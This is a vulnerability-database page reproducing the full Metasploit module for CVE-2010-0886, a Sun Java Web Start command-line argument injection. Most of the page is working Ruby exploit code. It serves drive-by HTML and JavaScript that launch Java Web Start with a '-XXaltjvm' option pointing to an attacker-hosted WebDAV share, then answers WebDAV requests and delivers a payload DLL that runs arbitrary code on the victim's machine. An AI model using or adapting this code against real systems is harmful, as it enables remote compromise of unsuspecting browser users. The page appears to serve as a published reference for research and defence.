Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)

🗓️ 21 Sep 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

Sun Java Web Start Plugin Command Line Argument Injection. Exploit flaw in the Web Start plugin component of Sun Java Web Start, allowing execution of arbitrary code in unsuspecting browser user's context. Requires root access and WebClient service enabled

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-0886
9 Apr 201000:00
circl
CISA		Oracle Releases Sun Java SE 1.6.0_20
16 Apr 201000:00
cisa
Check Point Advisories		Oracle Java Web Start Launch Command-Line Injection (CVE-2010-0886; CVE-2010-0887; CVE-2010-1423)
26 May 201000:00
checkpoint_advisories
CVE		CVE-2010-0886
20 Apr 201019:00
cve
Cvelist		CVE-2010-0886
20 Apr 201019:00
cvelist
EUVD		EUVD-2010-0912
7 Oct 202500:30
euvd
Tenable Nessus		GLSA-201006-18 : Oracle JRE/JDK: Multiple vulnerabilities
4 Jun 201000:00
nessus
Tenable Nessus		Mac OS X : Java for Mac OS X 10.5 Update 7
19 May 201000:00
nessus
Tenable Nessus		Mac OS X : Java for Mac OS X 10.6 Update 2
19 May 201000:00
nessus
Tenable Nessus		Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities
15 Apr 201000:00
nessus
Rows per page
##
# $Id: java_ws_arginject_altjvm.rb 10404 2010-09-21 00:13:30Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection',
			'Description'    => %q{
					This module exploits a flaw in the Web Start plugin component of Sun Java
				Web Start. The arguments passed to Java Web Start are not properly validated.
				By passing the lesser known -J option, an attacker can pass arbitrary options
				directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
				by Ruben Santamarta, an attacker can execute arbitrary code in the context of
				an unsuspecting browser user.

				This vulnerability was originally discovered independently by both Ruben
				Santamarta and Tavis Ormandy. Tavis reported that all versions since version
				6 Update 10 "are believed to be affected by this vulnerability."

				In order for this module to work, it must be ran as root on a server that
				does not serve SMB. Additionally, the target host must have the WebClient
				service (WebDAV Mini-Redirector) enabled.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'jduck',
			'Version'        => '$Revision: 10404 $',
			'References'     =>
				[
					[ 'CVE', '2010-0886' ],
					[ 'OSVDB', '63648' ],
					[ 'BID', '39346' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],
					[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]
				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => '',
					'DisableNops' => true,
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[ 'Java Runtime on Windows x86',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 09 2010'
			))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
				OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
				OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
			], self.class)
	end


	def auto_target(cli, request)
		agent = request.headers['User-Agent']

		ret = nil
		#print_status("Agent: #{agent}")
		# Check for MSIE and/or WebDAV redirector requests
		if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
			ret = targets[1]
		elsif agent =~ /MSIE (6|7|8)\.0/
			ret = targets[1]
		else
			print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
		end

		ret
	end


	def on_request_uri(cli, request)

		# For this exploit, this does little besides ensures the user agent is a recognized one..
		mytarget = target
		if target.name == 'Automatic'
			mytarget = auto_target(cli, request)
			if (not mytarget)
				send_not_found(cli)
				return
			end
		end

		# Special case to process OPTIONS for /
		if (request.method == 'OPTIONS' and request.uri == '/')
			process_options(cli, request, mytarget)
			return
		end

		# Discard requests for ico files
		if (request.uri =~ /\.ico$/i)
			send_not_found(cli)
			return
		end

		# If there is no subdirectory in the request, we need to redirect.
		if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
			if (request.uri == '/')
				subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
			else
				subdir = request.uri + '/'
			end
			print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
			send_redirect(cli, subdir)
			return
		else
			share_name = $1
		end

		# dispatch WebDAV requests based on method first
		case request.method
		when 'OPTIONS'
			process_options(cli, request, mytarget)

		when 'PROPFIND'
			process_propfind(cli, request, mytarget)

		when 'GET'
			process_get(cli, request, mytarget, share_name)

		when 'PUT'
			print_status("Sending 404 for PUT #{request.uri} ...")
			send_not_found(cli)

		else
			print_error("Unexpected request method encountered: #{request.method}")

		end

	end

	#
	# GET requests
	#
	def process_get(cli, request, target, share_name)

		print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
		# dispatch based on extension
		if (request.uri =~ /\.dll$/i)
			#
			# DLL requests sent by IE and the WebDav Mini-Redirector
			#
			print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")

			# Re-generate the payload
			return if ((p = regenerate_payload(cli)) == nil)

			# Generate a DLL based on the payload
			dll_data = generate_payload_dll({ :code => p.encoded })

			# Send it :)
			send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })

		else
			#
			# HTML requests sent by IE and Firefox
			#
			my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

			# Always prepare the UNC path, even if we dont use it for this request...
			if (datastore['UNCPATH'])
				unc = datastore['UNCPATH'].dup
			else
				unc = "\\\\" + my_host + "\\" + share_name
			end
			jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
			docbase = rand_text_alphanumeric(8+rand(8))

			# Provide the corresponding HTML page...
			if (request.uri =~ /\.shtml/i)
				print_status("Sending JS version HTML to #{cli.peerhost}:#{cli.peerport}...")
				# Javascript version...
				var_str = rand_text_alpha(8+rand(8))
				var_obj = rand_text_alpha(8+rand(8))
				var_obj2 = rand_text_alpha(8+rand(8))
				var_obj3 = rand_text_alpha(8+rand(8))
				js_jnlp = "http: "
				js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez

				# The 8ad.. CLSID doesn't support the launch method ...
				#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
				clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
				html = %Q|<html>
<body>Please wait...
<script language="javascript">
var #{var_str} = "#{js_jnlp}";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var #{var_obj} = document.createElement("OBJECT");
#{var_obj}.classid = "clsid:#{clsid}";
#{var_obj}.launch(#{var_str});
} else {
try {
var #{var_obj2} = document.createElement("OBJECT");
#{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(#{var_obj2});
#{var_obj2}.launch(#{var_str});
} catch (e) {
var #{var_obj3} = document.createElement("OBJECT");
#{var_obj3}.type = "application/java-deployment-toolkit";
document.body.appendChild(#{var_obj3});
#{var_obj3}.launch(#{var_str});
}
}
</script>
</body>
</html>
|
			elsif (request.uri =~ /\.htm/i)
				print_status("Sending non-JS version HTML to #{cli.peerhost}:#{cli.peerport}...")
				clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]
				clsid = clsids[rand(clsids.length)]
				html = %Q|<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}"
width="0" height="0">
<PARAM name="launchjnlp" value="#{jnlp}">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet"
width="0" height="0"
launchjnlp="#{jnlp}"
docbase="#{docbase}"
/>
</body>
</html>
|
			else
				print_status("Sending js detection HTML to #{cli.peerhost}:#{cli.peerport}...")

				# NOTE: The JS version is preferred to the HTML version since it works on more JRE versions
				js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml"
				no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm"

				html = %Q|<html>
<head>
<meta http-equiv="refresh" content="2;#{no_js_uri}" />
</head>
<body>
Please wait...
<script language="javascript">
document.location = "#{js_uri}";
</script>
</body>
</html>
|
				# end of detection html
			end

			send_response_html(cli, html,
				{
					'Content-Type' => 'text/html',
					'Pragma' => 'no-cache'
				})
		end

	end

	#
	# OPTIONS requests sent by the WebDav Mini-Redirector
	#
	def process_options(cli, request, target)
		print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
		headers = {
			#'DASL'   => '<DAV:sql>',
			#'DAV'    => '1, 2',
			'Allow'  => 'OPTIONS, GET, PROPFIND',
			'Public' => 'OPTIONS, GET, PROPFIND'
		}
		send_response(cli, '', headers)
	end


	#
	# PROPFIND requests sent by the WebDav Mini-Redirector
	#
	def process_propfind(cli, request, target)
		path = request.uri
		print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
		body = ''

		if (path =~ /\.dll$/i)
			# Response for the DLL
			print_status("Sending DLL multistatus for #{path} ...")
#<lp1:getcontentlength>45056</lp1:getcontentlength>
			body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|

		elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
			# Response for anything else (generally just /)
			print_status("Sending directory multistatus for #{path} ...")
			body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|

		else
			print_status("Sending 404 for #{path} ...")
			send_not_found(cli)
			return

		end

		# send the response
		resp = create_response(207, "Multi-Status")
		resp.body = body
		resp['Content-Type'] = 'text/xml'
		cli.send_response(resp)
	end


	#
	# Make sure we're on the right port/path to support WebDAV
	#
	def exploit
		if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
			raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
		end

		super
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Sep 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.80974
sun javaweb startcommand line injectionarbitrary code executionroot accesswebclient service
43